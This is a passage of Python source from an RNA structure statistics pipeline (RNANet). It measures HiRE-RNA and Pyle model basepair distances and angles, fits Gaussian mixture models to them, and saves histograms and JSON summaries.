    df = pd.DataFrame(l_angl, columns=["Residue", "C4'-P-O5'", "C1'-C4'-P", "C5'-C4'-P", "P-O5'-C5'", "O5'-C5'-C4'", "C5'-C4'-C1'", "C4'-C1'-B1", "C1'-B1-B2"])
    df.to_csv(runDir + '/results/geometry/HiRE-RNA/angles/angles_HiRERNA ' + name + ".csv")
    df=pd.DataFrame(l_tors, columns=["Residue", "P-O5'-C5'-C4'", "O5'-C5'-C4'-C1'", "C5'-C4'-C1'-B1", "C4'-C1'-B1-B2", "O5'-C5'-C4'-P°", "C5'-C4'-P°-O5'°", "C4'-P°-O5'°-C5'°", "C1'-C4'-P°-O5'°"])
    df.to_csv(runDir + '/results/geometry/HiRE-RNA/torsions/torsions_HiRERNA '+name+'.csv')
@trace_unhandled_exceptions
def measures_hrna_basepairs(name, s, path_to_3D_data, thr_idx):
    """
    Open a rna_only/ file, and run measures_hrna_basepairs_chain() on every chain.

    Parameters:
        name            : chain/file identifier, also the datapoint CSV name
        s               : parsed structure; only the first chain of the first
                          model is processed
        path_to_3D_data : folder containing the datapoints/ CSV files
        thr_idx         : worker index, used to position the tqdm progress bar

    Saves one basepairs_{name}.csv file under results/geometry/HiRE-RNA/basepairs/.
    """
    setproctitle(f"RNANet statistics.py Worker {thr_idx+1} measures_hrna_basepairs({name})")

    l = []
    chain = next(s[0].get_chains())

    # do not recompute something already computed
    if os.path.isfile(runDir + "/results/geometry/HiRE-RNA/basepairs/basepairs_"+name+".csv"):
        return

    df = pd.read_csv(os.path.abspath(path_to_3D_data +"datapoints/" + name))

    # if df['index_chain'][0] == 1: # ignore files with numbering errors : TODO : remove when we get DSSR Pro, there should not be numbering errors anymore
    l = measures_hrna_basepairs_chain(name, chain, df, thr_idx)

    df_calc = pd.DataFrame(l, columns=["type_LW", "nt1_idx", "nt1_res", "nt2_idx", "nt2_res", "Distance",
                                       "211_angle", "112_angle", "dB1", "dB2", "alpha1", "alpha2", "3211_torsion", "1123_torsion"])
    df_calc.to_csv(runDir + "/results/geometry/HiRE-RNA/basepairs/"+'basepairs_' + name + '.csv', float_format="%.3f")
@trace_unhandled_exceptions
def measures_hrna_basepairs_chain(name, chain, df, thr_idx):
    """
    Cleanup of the dataset, then measurement of distances and angles
    between paired nucleotides in the chain.

    Parameters:
        name    : chain identifier (progress-bar label only)
        chain   : Bio.PDB-style chain, indexed by (' ', index_chain, ' ')
        df      : datapoints DataFrame with at least the columns
                  index_chain, old_nt_resnum, paired, pair_type_LW
        thr_idx : worker index, used to position the tqdm progress bar

    Returns:
        A list of rows [type_LW, nt1_idx, nt1_res, nt2_idx, nt2_res, *measures]
        where *measures comes from basepair_measures().
    """
    results = []
    warnings.simplefilter(action="ignore", category=SettingWithCopyWarning)

    pairs = df[['index_chain', 'old_nt_resnum', 'paired', 'pair_type_LW']]  # columns we keep

    # Remove the lines where there is no pairing (NaN in 'paired').
    # NOTE: the previous version repeated this drop once per original row,
    # which was O(n^2) for no effect after the first pass; one drop suffices.
    index_with_nan = pairs.index[pairs.iloc[:, 2].isnull()]
    pairs.drop(index_with_nan, axis=0, inplace=True)

    # Convert values of 'paired' to integers or lists of integers.
    paired_int = []
    for i in pairs.index:
        paired = pairs.at[i, 'paired']
        if type(paired) is np.int64 or type(paired) is np.float64:
            paired_int.append(int(paired))
        else :  # strings
            if len(paired) < 3:  # a single pairing
                paired_int.append(int(paired))
            else :  # several pairings, e.g. "12,25"
                paired_int.append([ int(p) for p in paired.split(',') ])

    # Same for 'pair_type_LW': a single LW code, or a list of codes.
    pair_type_LW_bis = []
    for j in pairs.index:
        pair_type_LW = pairs.at[j, 'pair_type_LW']
        if len(pair_type_LW) < 4 :  # a single pairing
            pair_type_LW_bis.append(pair_type_LW)
        else :  # several pairings, e.g. "cWW,tHS"
            pair_type_LW_bis.append(pair_type_LW.split(','))

    # addition of these new columns
    pairs.insert(4, "paired_int", paired_int, True)
    pairs.insert(5, "pair_type_LW_bis", pair_type_LW_bis, True)

    # deletion of lines with a 0 in paired_int (pairing with another RNA chain)
    indexNames = pairs[pairs['paired_int'] == 0].index
    pairs.drop(indexNames, inplace=True)

    for i in tqdm(pairs.index, position=thr_idx+1, desc=f"Worker {thr_idx+1}: {name} measures_hrna_basepairs_chain", unit="res", leave=False):
        # calculations for each row of the pairs dataset
        index = pairs.at[i, 'index_chain']
        res1 = chain[(' ', index, ' ')].get_resname()
        if res1 not in ['A','C','G','U']:
            continue
        type_LW = pairs.at[i, 'pair_type_LW_bis']  # pairing type(s)
        num_paired = pairs.at[i, 'paired_int']     # number (index_chain) of the paired nucleotide(s)

        if type(num_paired) is int or type(num_paired) is np.int64:
            # a single pairing partner
            res2 = chain[(' ', num_paired, ' ')].get_resname()
            if res2 not in ["A","C","G","U"]:
                continue
            measures = basepair_measures(chain[(' ', index, ' ')], chain[(' ', num_paired, ' ')])
            if measures is not None:
                results.append([type_LW, index, res1, num_paired, res2] + measures)
        else:
            for j in range(len(num_paired)):  # if several pairings, process them one by one
                if num_paired[j] != 0:
                    res2 = chain[(' ', num_paired[j], ' ')].get_resname()
                    if res2 not in ["A","C","G","U"]:
                        continue
                    measures = basepair_measures(chain[(' ', index, ' ')], chain[(' ', num_paired[j], ' ')])
                    if measures is not None:
                        results.append([type_LW[j], index, res1, num_paired[j], res2] + measures)

    return results
@trace_unhandled_exceptions
def basepair_measures(res, pair):
    """
    Measurement of the distances and flat/dihedral angles describing a
    basepair in the HiRE-RNA model.

    Three reference beads are chosen per nucleotide: (C4', C1', B1) for
    pyrimidines and (C1', B1, B2) for purines, named a3/a2/a1 respectively
    (a1 is the base tip).

    Parameters:
        res, pair : the two paired residue objects.

    Returns:
        [dist, b, c, d1, d2, a1, a2, tau1, tau2] (distances in Angströms,
        angles in degrees), or None when a needed atom/bead is missing.

    NOTE(review): if res or pair is not one of A/C/G/U, a3_res/a3_pair are
    never assigned and the code below raises NameError — presumably caught
    by the @trace_unhandled_exceptions decorator; confirm callers filter
    residues beforehand (measures_hrna_basepairs_chain does).
    """
    if res.get_resname()=='C' or res.get_resname()=='U' :
        atom_c4_res = [ atom.get_coord() for atom in res if "C4'" in atom.get_fullname() ]
        atom_c1p_res = [ atom.get_coord() for atom in res if "C1'" in atom.get_fullname() ]
        atom_b1_res = pos_b1(res)
        if not len(atom_c4_res) or not len(atom_c1p_res) or not len(atom_b1_res):
            return
        a3_res = Vector(atom_c4_res[0])
        a2_res = Vector(atom_c1p_res[0])
        a1_res = Vector(atom_b1_res[0])
    if res.get_resname()=='A' or res.get_resname()=='G' :
        atom_c1p_res = [ atom.get_coord() for atom in res if "C1'" in atom.get_fullname() ]
        atom_b1_res = pos_b1(res)
        atom_b2_res = pos_b2(res)
        if not len(atom_c1p_res) or not len(atom_b1_res) or not len(atom_b2_res):
            return
        a3_res = Vector(atom_c1p_res[0])
        a2_res = Vector(atom_b1_res[0])
        a1_res = Vector(atom_b2_res[0])
    if pair.get_resname()=='C' or pair.get_resname()=='U' :
        atom_c4_pair = [ atom.get_coord() for atom in pair if "C4'" in atom.get_fullname() ]
        atom_c1p_pair = [ atom.get_coord() for atom in pair if "C1'" in atom.get_fullname() ]
        atom_b1_pair = pos_b1(pair)
        if not len(atom_c4_pair) or not len(atom_c1p_pair) or not len(atom_b1_pair):
            return
        a3_pair = Vector(atom_c4_pair[0])
        a2_pair = Vector(atom_c1p_pair[0])
        a1_pair = Vector(atom_b1_pair[0])
    if pair.get_resname()=='A' or pair.get_resname()=='G' :
        atom_c1p_pair = [ atom.get_coord() for atom in pair if "C1'" in atom.get_fullname() ]
        atom_b1_pair = pos_b1(pair)
        atom_b2_pair = pos_b2(pair)
        if not len(atom_c1p_pair) or not len(atom_b1_pair) or not len(atom_b2_pair): # No C1' atom in the paired nucleotide, skip measures.
            return
        a3_pair = Vector(atom_c1p_pair[0])
        a2_pair = Vector(atom_b1_pair[0])
        a1_pair = Vector(atom_b2_pair[0])

    # Bond vectors
    res_32 = a3_res - a2_res
    res_12 = a1_res - a2_res
    pair_32 = a3_pair - a2_pair
    pair_12 = a1_pair - a2_pair
    rho = a1_res - a1_pair # from pair to res

    # distance between the two base tips
    dist = rho.norm()

    # we calculate the 2 plane angles
    with warnings.catch_warnings():
        warnings.simplefilter('ignore', RuntimeWarning)
        b = res_12.angle(rho)*(180/np.pi)   # equal to the previous implementation
        c = pair_12.angle(-rho)*(180/np.pi) #

    # Compute plane vectors
    n1 = (res_32**res_12).normalized() # ** between vectors, is the cross product
    n2 = (pair_32**pair_12).normalized()

    # Distances between base tip and the other base's plane (orthogonal projection)
    # if angle(rho, n) > pi/2 the distance is negative (signed following n)
    d1 = rho*n1 # projection of rho on axis n1 (* between vectors is the dot product)
    d2 = rho*n2

    # Now the projection of rho in the planes. It's just a sum of the triangles' two other edges.
    p1 = (-rho+n1**d1).normalized() # between vector and scalar, ** is the multiplication by a scalar
    p2 = (rho-n2**d2).normalized()

    # Measure tau, the dihedral
    u = (res_12**rho).normalized()
    v = (rho**pair_12).normalized()
    cosTau1 = n1*u
    cosTau2 = v*n2

    # cosTau is enough to compute alpha, but we can't distinguish
    # yet between tau and -tau. If the full computation is required, then:
    tau1 = np.arccos(cosTau1)*(180/np.pi)
    tau2 = np.arccos(cosTau2)*(180/np.pi)
    w1 = u**n1
    w2 = v**n2
    if res_12*w1 < 0:
        tau1 = -tau1
    if pair_12*w2 < 0:
        tau2 = -tau2

    # And finally, the a1 and a2 angles between res_12 and p1 / pair_12 and p2
    with warnings.catch_warnings():
        warnings.simplefilter('ignore', RuntimeWarning)
        a1 = (-res_12).angle(p1)*(180/np.pi)
        a2 = (-pair_12).angle(p2)*(180/np.pi)
    if cosTau1 > 0:
        # CosTau > 0 (Tau < 90 or Tau > 270) implies that alpha > 180.
        a1 = -a1
    if cosTau2 > 0:
        a2 = -a2

    return [dist, b, c, d1, d2, a1, a2, tau1, tau2]
@trace_unhandled_exceptions
def GMM_histo(data_ori, name_data, scan, toric=False, hist=True, col=None, save=True) :
    """
    Plot a Gaussian-Mixture-Model (with or without histograms) fitted on the
    given measures, and save the fitted parameters to
    results/geometry/json/{name_data}.json.

    Parameters:
        data_ori  : 1-D sequence of observations (angles in degrees, or distances)
        name_data : measure name, used for titles, file names and the JSON summary
        scan      : if True, pick the number of components (1..8) by maximum
                    likelihood; if False, look it up in the modes_data table
        toric     : treat the data as periodic angles in ]-180, 180]
        hist      : if True, plot over a histogram and save a standalone figure;
                    if False, add the summed GMM curve to the current figure
        col       : matplotlib color of the summed curve (hist=False only)
        save      : save the histogram figure to disk (hist=True only)
    """
    if len(data_ori) < 30:
        # too few observations for a meaningful mixture fit
        warn(f"We only have {len(data_ori)} observations of {name_data}, we cannot model it. Skipping.")
        return

    data_ori = np.array(data_ori)

    if toric:
        # Extend the data on the right and on the left (for angles)
        data = np.concatenate([data_ori, data_ori-360.0, data_ori+360.0])
    else:
        data = data_ori

    # chooses the number of components based on the maximum likelihood value (maxlogv)
    if scan:
        n_components_range = np.arange(8)+1
        # aic = []
        # bic = []
        maxlogv=[]
        md = np.array(data).reshape(-1,1)
        nb_components = 1
        nb_log_max = n_components_range[0]
        log_max = 0
        for n_comp in n_components_range:
            gmm = GaussianMixture(n_components=n_comp, random_state=1234).fit(md)
            # aic.append(abs(gmm.aic(md)))
            # bic.append(abs(gmm.bic(md)))
            maxlogv.append(gmm.lower_bound_)
            if gmm.lower_bound_== max(maxlogv) : # takes the maximum
                nb_components = n_comp
                # if there is convergence, keep the first maximum found
                if abs(gmm.lower_bound_-log_max) < 0.02 : # threshold=0.02
                    nb_components = nb_log_max
                    break
            log_max = max(maxlogv)
            nb_log_max = n_comp
    else:
        try:
            nb_components = modes_data[name_data]
        except KeyError:
            warn(f"Unexpected key {name_data} not known in geometric_stats.py mode_data. Skipping.")
            return # unexpected atom ? skip it...
        if toric:
            nb_components = nb_components * 2 + 1 # because we extend the xrange for toric computation. It will be restored later.

    # Now compute the final GMM
    obs = np.array(data).reshape(-1,1) # still on extended data
    g = GaussianMixture(n_components=nb_components, random_state=1234)
    g.fit(obs)

    if toric:
        # Now decide which to keep: only components whose mean lies in ]-180, 180]
        keep = []
        weights = []
        means = []
        covariances = []
        sum_weights = 0.0
        for m in g.means_:
            keep.append(m > -180 and m <= 180)
        # renormalize the kept weights so they sum to 1
        for i, w in enumerate(g.weights_):
            if not keep[i]:
                continue
            sum_weights += w
        for i in range(nb_components):
            if not keep[i]:
                continue
            means.append(g.means_[i])
            covariances.append(g.covariances_[i])
            weights.append(g.weights_[i]/sum_weights)
        nb_components = len(means)
    else:
        weights = g.weights_
        means = g.means_
        covariances = g.covariances_

    if nb_components == 0:
        # Happens when the gaussians averages are outside [-180, 180]
        # and have been eliminated. Fix: increase the number of components
        # so that at least one is inside [-180,180]
        warn(f"Found 0 gaussians in interval [-180,180] for the {name_data} GMM. Please retry with a higher number of gaussians. Ignoring the measure for now.", error=True)
        return

    # plot histograms if asked, with the appropriate number of components
    if hist:
        plt.hist(data_ori, color="green", edgecolor='black', linewidth=1.2, bins=50, density=True)
    if toric:
        plt.xlabel("Angle (Degrees)")
    else:
        plt.xlabel("Distance (Angströms)")
    plt.ylabel("Density")

    # Prepare the GMM curve with some absciss points
    if toric:
        x = np.linspace(-360.0,360.0,721)
    else:
        D = obs.ravel()
        xmin = D.min()
        #xmax = min(10.0, D.max())
        xmax = D.max()
        x = np.linspace(xmin,xmax,1000)
    colors=['red', 'blue', 'gold', 'cyan', 'magenta', 'white', 'black', 'green']

    # prepare the dictionary to save the parameters
    summary_data = {}
    summary_data["measure"] = name_data
    summary_data["weights"] = []
    summary_data["means"] = []
    summary_data["std"] = []

    # plot the individual component curves
    curves = []
    newx = None # to be defined inside the loop
    for i in range(nb_components):
        # store the parameters
        mean = means[i]
        sigma = np.sqrt(covariances[i])
        weight = weights[i]
        summary_data["means"].append("{:.2f}".format(float(str(mean).strip("[]"))))
        summary_data["std"].append("{:.2f}".format(float(str(sigma).strip("[]"))))
        summary_data["weights"].append("{:.2f}".format(float(str(weight).strip("[]"))))

        # compute the right x and y data to plot
        y = weight*st.norm.pdf(x, mean, sigma)
        if toric:
            # Wrap the extended [-360, 360] curve back into ]-180, 180],
            # summing the overlapping halves pairwise.
            # NOTE(review): the %360 wrap is applied to the density values
            # y[0] as well as to x — looks suspicious, confirm intended.
            y_mod = (((y[0]+180.0)%360.0)-180.0)
            x_mod = (((x+180.0)%360.0)-180.0)
            s = sorted(zip(x_mod,y_mod))
            newx = []
            newy = []
            for k in range(0, len(s), 2):
                # NOTE(review): k is an int index; the comparisons to the
                # floats 362.0 / 360.0 rely on int==float equality — confirm
                # these are meant as index values, not angle values.
                if k == 362.0:
                    continue # this value is dealt with when k = 360.0
                # print(k, "summing: ", s[k-int(k>360)], s[k+1-int(k>360)])
                newx.append(s[k-int(k>360)][0])
                if k == 360.0:
                    newy.append(s[k][1]+s[k+1][1]+s[k+2][1])
                else:
                    newy.append(s[k-int(k>360)][1]+s[k+1-int(k>360)][1])
        else:
            newx = x
            newy = y[0]

        if hist:
            # plot on top of the histograms
            plt.plot(newx, newy, c=colors[i])
        else:
            # store for later summation
            curves.append(np.array(newy))

    if hist:
        plt.title(f"Histogram of {name_data} with GMM of {nb_components} components (" + str(len(data_ori))+" values)")
        if save:
            plt.savefig(f"Histogram_{name_data}_{nb_components}_comps.png")
            plt.close()
    else:
        # Plot their sum, do not save figure yet
        plt.plot(newx, sum(curves), c=col, label=name_data)
        plt.legend()

    # Save the json
    with open(runDir + "/results/geometry/json/" + name_data + ".json", 'w', encoding='utf-8') as f:
        json.dump(summary_data, f, indent=4)
    notify("Saved " + name_data + ".json")
@trace_unhandled_exceptions
def gmm_aa_dists(scan):
    """
    Draw the figures representing the data on the measurements of distances between atoms.

    For every bond length, GMM_histo() fits a Gaussian mixture and saves a
    histogram figure plus a JSON summary. Then, for each atom group (atoms
    common to all nucleotides, purine-cycle atoms, pyrimidine-cycle atoms),
    a summary figure superposing the fitted GMM curves is saved.

    scan: forwarded to GMM_histo (whether to scan the number of GMM components).
    """
    setproctitle("GMM (all atoms, distances)")

    df = pd.read_csv(os.path.abspath(runDir + "/results/geometry/all-atoms/distances/dist_atoms.csv"))

    def values_of(bond):
        # Column values with NaNs removed (a bond is only measured in residues that contain it)
        return df[bond][~ np.isnan(df[bond])].values.tolist()

    # (bond label, curve color in the group summary figure)
    # Atoms common to all nucleotides (backbone + ribose)
    common_bonds = [
        ("O3'-P", 'saddlebrown'), ("P-OP1", 'gold'), ("P-OP2", 'lightseagreen'),
        ("P-O5'", 'darkturquoise'), ("O5'-C5'", 'darkkhaki'), ("C5'-C4'", 'indigo'),
        ("C4'-O4'", 'maroon'), ("C4'-C3'", 'burlywood'), ("C3'-O3'", 'steelblue'),
        ("O4'-C1'", 'tomato'), ("C1'-C2'", 'darkolivegreen'), ("C2'-C3'", 'orchid'),
        ("C2'-O2'", 'deeppink'),
    ]
    # Bonds found in purines (A or G); C6-O6/C2-N2 are G-specific, C6-N6 is A-specific
    purine_bonds = [
        ("C1'-N9", 'lightcoral'), ("N9-C8", 'gold'), ("C8-N7", 'lightseagreen'),
        ("N7-C5", 'saddlebrown'), ("C5-C6", 'darkturquoise'), ("C6-O6", 'darkkhaki'),
        ("C6-N6", 'indigo'), ("C6-N1", 'maroon'), ("N1-C2", 'burlywood'),
        ("C2-N2", 'steelblue'), ("C2-N3", 'tomato'), ("N3-C4", 'darkolivegreen'),
        ("C4-N9", 'orchid'), ("C4-C5", 'deeppink'),
    ]
    # Bonds found in pyrimidines (C or U); C4-N4 is C-specific, C4-O4 is U-specific
    pyrimidine_bonds = [
        ("C1'-N1", 'lightcoral'), ("N1-C6", 'gold'), ("C6-C5", 'lightseagreen'),
        ("C5-C4", 'deeppink'), ("C4-N3", 'red'), ("N3-C2", 'lime'),
        ("C2-O2", 'indigo'), ("C2-N1", 'maroon'), ("C4-N4", 'burlywood'),
        ("C4-O4", 'steelblue'),
    ]

    # Extract all datasets up front, so that a missing CSV column fails
    # before any figure is written.
    common = [ (label, values_of(label), color) for label, color in common_bonds ]
    purines = [ (label, values_of(label), color) for label, color in purine_bonds ]
    pyrimidines = [ (label, values_of(label), color) for label, color in pyrimidine_bonds ]

    def plot_group(folder, bonds, title, figname, fontsize=None):
        # One histogram+GMM figure and one JSON summary per distance, then a
        # summary figure superposing the GMM curves of the whole group.
        path = runDir + "/results/figures/GMM/all-atoms/distances/" + folder + "/"
        os.makedirs(path, exist_ok=True)
        os.chdir(path)
        for label, data, _ in bonds:
            GMM_histo(data, label, scan)
        for label, data, color in bonds:
            GMM_histo(data, label, scan, toric=False, hist=False, col=color)
        axes = plt.gca()
        axes.set_ylim(0, 100)
        plt.xlabel("Distance (Angströms)")
        if fontsize is None:
            plt.title(title)
        else:
            plt.title(title, fontsize=fontsize)
        plt.savefig(path + figname)
        plt.close()

    plot_group("commun", common,
               "GMM of distances between common atoms ",
               "GMM_distances_common_atoms.png")
    plot_group("purines", purines,
               "GMM of distances between atoms of the purine cycles",
               "GMM_distances_purine_cycles.png", fontsize=10)
    plot_group("pyrimidines", pyrimidines,
               "GMM of distances between atoms of the pyrimidine cycles",
               "GMM_distances_pyrimidine_cycles.png", fontsize=10)

    os.chdir(runDir)
    setproctitle("GMM (all atoms, distances) finished")
@trace_unhandled_exceptions
def gmm_aa_torsions(scan, res):
    """
    Separates the torsion angle measurements by angle type and plots the figures representing the data.

    For each of the 7 torsion angles (alpha..zeta, chi), draws the
    histogram+GMM figure with its JSON summary, then a figure superposing
    the GMM curves of all angles for comparison.

    scan: forwarded to GMM_histo.
    res:  resolution threshold, forwarded to retrieve_angles() to filter the database.
    """
    setproctitle("GMM (all atoms, torsions)")

    # Retrieve the angle values from the database; NULL values are dropped below.
    angles_deg = retrieve_angles(runDir + "/results/RNANet.db", res)

    # (figure/JSON label, raw values, curve color in the summary figure)
    # "Xhi" (not "Chi") is the historical label used in the JSON outputs.
    torsions = [
        ("Alpha", angles_deg.alpha.values, 'red'),
        ("Beta", angles_deg.beta.values, 'firebrick'),
        ("Gamma", angles_deg.gamma.values, 'limegreen'),
        ("Delta", angles_deg.delta.values, 'darkslateblue'),
        ("Epsilon", angles_deg.epsilon.values, 'goldenrod'),
        ("Zeta", angles_deg.zeta.values, 'teal'),
        ("Xhi", angles_deg.chi.values, 'hotpink'),
    ]
    # Remove the NaN values
    torsions = [ (name, vals[~np.isnan(vals)], color) for name, vals, color in torsions ]

    os.makedirs(runDir + "/results/figures/GMM/all-atoms/torsions/", exist_ok=True)
    os.chdir(runDir + "/results/figures/GMM/all-atoms/torsions/")

    # Histogram + GMM figure and JSON summary for each angle
    for name, vals, _ in torsions:
        GMM_histo(vals, name, scan, toric=True)

    # Summary figure grouping the GMMs of all angles, without histograms
    for name, vals, color in torsions:
        GMM_histo(vals, name, scan, toric=True, hist=False, col=color)
    plt.xlabel("Angle (Degrees)")
    plt.title("GMM of torsion angles")
    plt.savefig("GMM_torsions.png")
    plt.close()

    os.chdir(runDir)
    setproctitle("GMM (all atoms, torsions) finished")
@trace_unhandled_exceptions
def gmm_pyle(scan, res):
    """
    Draw the figures for the measurements of the Pyle coarse-grained model:
    distances, flat angles, and eta/theta pseudo-torsion angles.

    scan: forwarded to GMM_histo.
    res:  resolution threshold, forwarded to retrieve_eta_theta().
    """
    setproctitle("GMM (Pyle model)")

    # Distances
    df = pd.read_csv(os.path.abspath(runDir + "/results/geometry/Pyle/distances/distances_pyle.csv"))
    # NOTE(review): the "C1'-P" column is plotted under the label "P-C1'" and
    # vice-versa (same for the C4'/P pair). This looks like a deliberate
    # direction convention — confirm against the code that writes the CSV.
    p_c1p = df["C1'-P"][~ np.isnan(df["C1'-P"])].values.tolist()
    c1p_p = df["P-C1'"][~ np.isnan(df["P-C1'"])].values.tolist()
    p_c4p = df["C4'-P"][~ np.isnan(df["C4'-P"])].values.tolist()
    c4p_p = df["P-C4'"][~ np.isnan(df["P-C4'"])].values.tolist()

    os.makedirs(runDir + "/results/figures/GMM/Pyle/distances/", exist_ok=True)
    os.chdir(runDir + "/results/figures/GMM/Pyle/distances/")

    # Histogram + GMM figure and JSON summary per distance
    GMM_histo(p_c1p, "P-C1'", scan)
    GMM_histo(c1p_p, "C1'-P", scan)
    GMM_histo(p_c4p, "P-C4'", scan)
    GMM_histo(c4p_p, "C4'-P", scan)

    # Summary figure superposing the four GMM curves
    GMM_histo(p_c4p, "P-C4'", scan, toric=False, hist=False, col='gold')
    GMM_histo(c4p_p, "C4'-P", scan, toric=False, hist=False, col='indigo')
    GMM_histo(p_c1p, "P-C1'", scan, toric=False, hist=False, col='firebrick')
    GMM_histo(c1p_p, "C1'-P", scan, toric=False, hist=False, col='seagreen')
    plt.xlabel("Distance (Angströms)")
    plt.title("GMM of distances (Pyle model)")
    plt.savefig("GMM_distances_pyle_model.png")
    plt.close()

    # Flat angles
    df = pd.read_csv(os.path.abspath(runDir + "/results/geometry/Pyle/angles/flat_angles_pyle.csv"))
    p_c1p_psuiv = list(df["P-C1'-P°"][~ np.isnan(df["P-C1'-P°"])])
    c1p_psuiv_c1psuiv = list(df["C1'-P°-C1'°"][~ np.isnan(df["C1'-P°-C1'°"])])

    os.makedirs(runDir + "/results/figures/GMM/Pyle/angles/", exist_ok=True)
    os.chdir(runDir + "/results/figures/GMM/Pyle/angles/")

    GMM_histo(p_c1p_psuiv, "P-C1'-P°", scan, toric=True)
    GMM_histo(c1p_psuiv_c1psuiv, "C1'-P°-C1'°", scan, toric=True)

    GMM_histo(p_c1p_psuiv, "P-C1'-P°", scan, toric=True, hist=False, col='firebrick')
    GMM_histo(c1p_psuiv_c1psuiv, "C1'-P°-C1'°", scan, toric=True, hist=False, col='seagreen')
    plt.xlabel("Angle (Degrees)")
    plt.title("GMM of flat angles (Pyle model)")
    plt.savefig("GMM_flat_angles_pyle_model.png")
    plt.close()

    # Pseudo-torsion angles
    angles_deg = retrieve_eta_theta(runDir + "/results/RNANet.db", res)

    # (figure/JSON label, raw values, curve color in the summary figure)
    pseudotorsions = [
        ("Eta", angles_deg.eta.values, 'mediumaquamarine'),
        ("Theta", angles_deg.theta.values, 'darkorchid'),
        ("Eta'", angles_deg.eta_prime.values, 'cyan'),
        ("Theta'", angles_deg.theta_prime.values, 'crimson'),
        ("Eta''", angles_deg.eta_base.values, 'royalblue'),
        ("Theta''", angles_deg.theta_base.values, 'palevioletred'),
    ]
    # Remove the NaN values
    pseudotorsions = [ (name, vals[~np.isnan(vals)], color) for name, vals, color in pseudotorsions ]

    os.makedirs(runDir + "/results/figures/GMM/Pyle/pseudotorsions/", exist_ok=True)
    os.chdir(runDir + "/results/figures/GMM/Pyle/pseudotorsions/")

    for name, vals, _ in pseudotorsions:
        GMM_histo(vals, name, scan, toric=True)
    for name, vals, color in pseudotorsions:
        GMM_histo(vals, name, scan, toric=True, hist=False, col=color)
    plt.xlabel("Angle (Degrees)")
    plt.title("GMM of pseudo-torsion angles (Pyle Model)")
    plt.savefig("GMM_pseudotorsion_angles_pyle_model.png")
    plt.close()

    os.chdir(runDir)
    setproctitle("GMM (Pyle model) finished")
@trace_unhandled_exceptions
def gmm_hrna(scan):
    """
    Draw the figures representing the data on the measurements between atoms of the HiRE-RNA model:
    distances, angles and torsion angles between the coarse-grained beads.

    scan: forwarded to GMM_histo.
    """
    setproctitle("GMM (HiRE-RNA)")

    def column(df, name):
        # Column values with NaNs removed
        return list(df[name][~ np.isnan(df[name])])

    # Distances
    df = pd.read_csv(os.path.abspath(runDir + "/results/geometry/HiRE-RNA/distances/distances_HiRERNA.csv"))
    # (label, data, curve color in the summary figure)
    distances = [
        ("O5'-C5'", column(df, "O5'-C5'"), 'lightcoral'),
        ("B1-B2", column(df, "B1-B2"), 'limegreen'),
        ("C1'-B1", column(df, "C1'-B1"), 'tomato'),
        ("C5'-C4'", column(df, "C5'-C4'"), 'aquamarine'),
        ("C4'-C1'", column(df, "C4'-C1'"), 'goldenrod'),
        ("P-O5'", column(df, "P-O5'"), 'darkcyan'),
        ("C4'-P", column(df, "C4'-P"), 'deeppink'),
    ]
    os.makedirs(runDir + "/results/figures/GMM/HiRE-RNA/distances/", exist_ok=True)
    os.chdir(runDir + "/results/figures/GMM/HiRE-RNA/distances/")
    for name, vals, _ in distances:
        GMM_histo(vals, name, scan)
    for name, vals, color in distances:
        GMM_histo(vals, name, scan, toric=False, hist=False, col=color)
    axes = plt.gca()
    axes.set_ylim(0, 100)
    plt.xlabel("Distance (Angströms)")
    plt.title("GMM of distances between HiRE-RNA beads")
    plt.savefig(runDir + "/results/figures/GMM/HiRE-RNA/distances/GMM_distances_HiRE_RNA.png")
    plt.close()

    # Angles
    df = pd.read_csv(os.path.abspath(runDir + "/results/geometry/HiRE-RNA/angles/angles_HiRERNA.csv"))
    angles = [
        ("C4'-P-O5'", column(df, "C4'-P-O5'"), 'lightcoral'),
        ("C1'-C4'-P", column(df, "C1'-C4'-P"), 'limegreen'),
        ("C5'-C4'-P", column(df, "C5'-C4'-P"), 'tomato'),
        ("P-O5'-C5'", column(df, "P-O5'-C5'"), 'aquamarine'),
        ("O5'-C5'-C4'", column(df, "O5'-C5'-C4'"), 'goldenrod'),
        ("C5'-C4'-C1'", column(df, "C5'-C4'-C1'"), 'darkcyan'),
        ("C4'-C1'-B1", column(df, "C4'-C1'-B1"), 'deeppink'),
        ("C1'-B1-B2", column(df, "C1'-B1-B2"), 'indigo'),
    ]
    os.makedirs(runDir + "/results/figures/GMM/HiRE-RNA/angles/", exist_ok=True)
    os.chdir(runDir + "/results/figures/GMM/HiRE-RNA/angles/")
    for name, vals, _ in angles:
        GMM_histo(vals, name, scan, toric=True)
    for name, vals, color in angles:
        GMM_histo(vals, name, scan, toric=True, hist=False, col=color)
    axes = plt.gca()
    axes.set_ylim(0, 100)
    # typo fix: was "Degres"; "Degrees" is the spelling used by all other figures
    plt.xlabel("Angle (Degrees)")
    plt.title("GMM of angles between HiRE-RNA beads")
    plt.savefig(runDir + "/results/figures/GMM/HiRE-RNA/angles/GMM_angles_HiRE_RNA.png")
    plt.close()

    # Torsions
    df = pd.read_csv(os.path.abspath(runDir + "/results/geometry/HiRE-RNA/torsions/torsions_HiRERNA.csv"))
    torsions = [
        ("P-O5'-C5'-C4'", column(df, "P-O5'-C5'-C4'"), 'darkred'),
        ("O5'-C5'-C4'-C1'", column(df, "O5'-C5'-C4'-C1'"), 'chocolate'),
        ("C5'-C4'-C1'-B1", column(df, "C5'-C4'-C1'-B1"), 'mediumvioletred'),
        ("C4'-C1'-B1-B2", column(df, "C4'-C1'-B1-B2"), 'cadetblue'),
        ("O5'-C5'-C4'-P°", column(df, "O5'-C5'-C4'-P°"), 'darkkhaki'),
        ("C5'-C4'-P°-O5'°", column(df, "C5'-C4'-P°-O5'°"), 'springgreen'),
        ("C4'-P°-O5'°-C5'°", column(df, "C4'-P°-O5'°-C5'°"), 'indigo'),
        ("C1'-C4'-P°-O5'°", column(df, "C1'-C4'-P°-O5'°"), 'gold'),
    ]
    os.makedirs(runDir + "/results/figures/GMM/HiRE-RNA/torsions/", exist_ok=True)
    os.chdir(runDir + "/results/figures/GMM/HiRE-RNA/torsions/")
    for name, vals, _ in torsions:
        GMM_histo(vals, name, scan, toric=True)
    for name, vals, color in torsions:
        GMM_histo(vals, name, scan, toric=True, hist=False, col=color)
    plt.xlabel("Angle (Degrees)")
    plt.title("GMM of torsion angles between HiRE-RNA beads")
    plt.savefig("GMM_torsions_HiRE_RNA.png")
    plt.close()

    os.chdir(runDir)
    setproctitle("GMM (HiRE-RNA) finished")
@trace_unhandled_exceptions
def gmm_hrna_basepairs(scan):
    """
    Measures parameters of all kinds of non-canonical basepairs for the HiRE-RNA model.
